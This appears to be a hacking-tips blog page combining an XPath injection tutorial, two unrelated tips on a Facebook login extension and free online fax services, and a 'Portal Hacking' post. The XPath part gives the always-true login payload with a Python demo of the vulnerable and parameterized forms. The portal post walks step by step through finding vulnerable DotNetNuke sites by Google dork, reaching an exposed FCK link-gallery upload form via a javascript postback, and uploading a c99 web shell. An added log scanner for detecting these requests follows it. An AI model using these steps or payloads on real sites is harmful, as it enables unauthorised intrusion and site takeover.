Tips & Tricks

Note: This is for education and learning purposes only.

 Hack Websites Database Using XPath Injection



Every day many websites get hacked, but most hackers attack those websites just for popularity and nothing else. Today I am writing this tutorial on XPath Injection, in which I will explain how hackers hack websites using XPath Injection.

In a typical web application architecture, all data is stored on a database server. This database server stores data in various formats, such as LDAP, XML or an RDBMS database. The application queries the server and accesses the information based on user input.


Normally, attackers try to extract more information than allowed by manipulating the query with specially crafted inputs. In this tutorial we'll discuss XPath injection techniques used to extract data from XML databases.

Before we go deeper into XPath injection, let's take a brief look at what XML and XPath are.

What is XML?

XML stands for Extensible Markup Language and was designed to describe data. It lets programmers create their own customized tags to store data on a database server. An XML document is broadly similar to an RDBMS database except for the way data is stored. In a normal database, data is stored in table rows and columns; in XML, data is stored in nodes in a tree.

What is XPath?

XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database.
XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source.

Let's learn with the help of an example that shows how XPath works. Assume that our database is represented by the following XML file:



<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
<user>
<username>wildhacker</username>
<password>123</password>
<account>admin</account>
</user>
<user>
<username>cutler</username>
<password>jay</password>
<account>guest</account>
</user>
<user>
<username>ronie</username>
<password>coleman</password>
<account>guest</account>
</user>
</users>

The above file shows how the username, password and account details are stored in XML.

The following XPath query returns the account whose username is "wildhacker" and whose password is "123":

string(//user[username/text()='wildhacker' and password/text()='123']/account/text())

If the application developer does not properly filter user input, the tester or hacker can easily inject XPath code and interfere with the query result. For instance, the hacker or tester could input the following values:

Username: ' or '1' = '1
Password: ' or '1' = '1

Using these above parameters, the query becomes:

string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())

As in most common SQL injection attacks, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password has not been provided.

And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.


If nothing is known about the internal details of the XML data, and the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack (I will explain that in a later tutorial), whose goal is to reconstruct the whole data structure. The technique is similar to inference-based SQL injection: the approach is to inject code that creates a query returning one bit of information.
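
The login query above, built two ways, as an added example that is not part of the original tutorial: once by string concatenation, as the vulnerable application does, and once with bound XPath variables. It assumes the third-party lxml library is installed; the function names are illustrative.

```python
from lxml import etree

# Constructed sample data: the user store shown in the tutorial.
USERS_XML = b"""<?xml version="1.0" encoding="ISO-8859-1"?>
<users>
  <user><username>wildhacker</username><password>123</password><account>admin</account></user>
  <user><username>cutler</username><password>jay</password><account>guest</account></user>
  <user><username>ronie</username><password>coleman</password><account>guest</account></user>
</users>"""

DOC = etree.fromstring(USERS_XML)


def login_vulnerable(username, password):
    """Concatenates input into the query text, so input can rewrite the predicate."""
    query = (
        "string(//user[username/text()='%s' and password/text()='%s']"
        "/account/text())" % (username, password)
    )
    return DOC.xpath(query)


def login_parameterized(username, password):
    """Binds input as XPath variables, so it is only ever compared as data."""
    query = "string(//user[username/text()=$u and password/text()=$p]/account/text())"
    return DOC.xpath(query, u=username, p=password)


def lone_quote_breaks_query(username):
    """True if a value makes the concatenated query fail to parse (the error probe)."""
    try:
        login_vulnerable(username, "")
    except etree.XPathError:
        return True
    return False


if __name__ == "__main__":
    payload = "' or '1' = '1"
    print("vulnerable   :", repr(login_vulnerable(payload, payload)))
    print("parameterized:", repr(login_parameterized(payload, payload)))
    print("lone quote raises in vulnerable form:", lone_quote_breaks_query("'"))
```

With concatenation the always-true predicate matches every user, and string() returns the first match in document order, which here is the admin account; with bound variables the same input matches nothing.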


That’s it.


 ======================================================================================================================

 Customize Your Facebook Login Page

I don't know whether you will like it or not, but just like the Windows logon screen, you can customize your Facebook login page too. Now you can make your own Facebook login page if you're bored with the normal one.




To customize the Facebook login page, download and install the Google Chrome extension named FB Refresh. Then just set the background image URL to customize your Facebook login page.

======================================================================================================================

 Free online Fax Sending Service



There are many websites that let you send a fax online; I am just highlighting some of them that are free.

  1. GotFreeFax
  2. MyFax
  3. PopFax

On these three sites you just enter the sender and receiver information, then upload your DOC or PDF file and send the fax online.


Free Online Fax Receiving Service


If you want to receive faxes online, there is an option for that too: you need to visit eFax, but the problem is that it is free for only 30 days. The best parts of this service are:

  1. Get a local fax number
  2. Send & receive faxes by email
  3. No risk/no obligation
  4. Secure and private

Free Online Fax Sending & Receiving Using Google Chrome Apps


I have another way to send and receive faxes online for free. This is not a website; it is a Google Chrome app or extension called HelloFax. Just download HelloFax and install it in Google Chrome to send and receive faxes online for free. This app also lets you sign documents and fill out forms.
So why use a fax machine when you can send a fax online free of cost? Next time you need to fax a document or PDF file, give this service a try, and please comment if it really works for you.


====================================================================================================================== 

Portal Hacking

Note: This article is for educational purposes only.
Step 1:
http://www.google.com

Step 2: Now enter this dork:
inurl:/tabid/36/language/en-US/Default.aspx

This is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3:
You will find many sites. Select the site which you are comfortable with.

Step 4: 
For example take this site.
Example:


Step 5: Now replace

/Home/tabid/36/Language/en-US/Default.aspx

with this

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6: You will get a Link Gallery page. So far so good!

Step 7: Don't do anything for now, wait for the next step...

Step 8:
Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')
 
Step 9: You will find the Upload option


Step 10:
Select Root

Step 11:
Upload your package, your shell: c99, c100, etc.
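
For site owners, the steps above leave a recognisable trace in the web server log: a request for the link gallery page followed by a form postback to it. The following added example (not part of the original post) scans a W3C extended format log for that pattern; the log lines are constructed samples and the field list is an assumption about the server's logging configuration.

```python
from collections import defaultdict

# Path taken from the steps above; compared case-insensitively.
GALLERY_PATH = "/providers/htmleditorproviders/fck/fcklinkgallery.aspx"

# Constructed sample log (W3C extended format, documentation IP ranges).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status
2024-01-10 09:00:01 198.51.100.7 GET /Home/tabid/36/Language/en-US/Default.aspx 200
2024-01-10 09:00:09 198.51.100.7 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 200
2024-01-10 09:00:31 198.51.100.7 POST /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 200
2024-01-10 09:02:00 203.0.113.20 GET /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 404
2024-01-10 09:05:12 192.0.2.44 GET /providers/htmleditorproviders/fck/fcklinkgallery.aspx 200
"""


def parse_w3c(text):
    """Yield one dict per request, using the #Fields directive for column names."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):
                yield dict(zip(fields, values))


def gallery_activity(text):
    """Map client IP -> 'viewed' or 'postback' for requests that reached the page."""
    methods = defaultdict(set)
    for row in parse_w3c(text):
        if row["cs-uri-stem"].lower() == GALLERY_PATH and row["sc-status"] != "404":
            methods[row["c-ip"]].add(row["cs-method"])
    # A POST means a form postback (such as the upload command) was submitted;
    # a GET alone means the page was only viewed.
    return {ip: ("postback" if "POST" in m else "viewed") for ip, m in methods.items()}


if __name__ == "__main__":
    for ip, level in gallery_activity(SAMPLE_LOG).items():
        print(ip, level)
```

Any client reported as "postback" warrants a review of the files created on the site around that time.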

 ======================================================================================================================
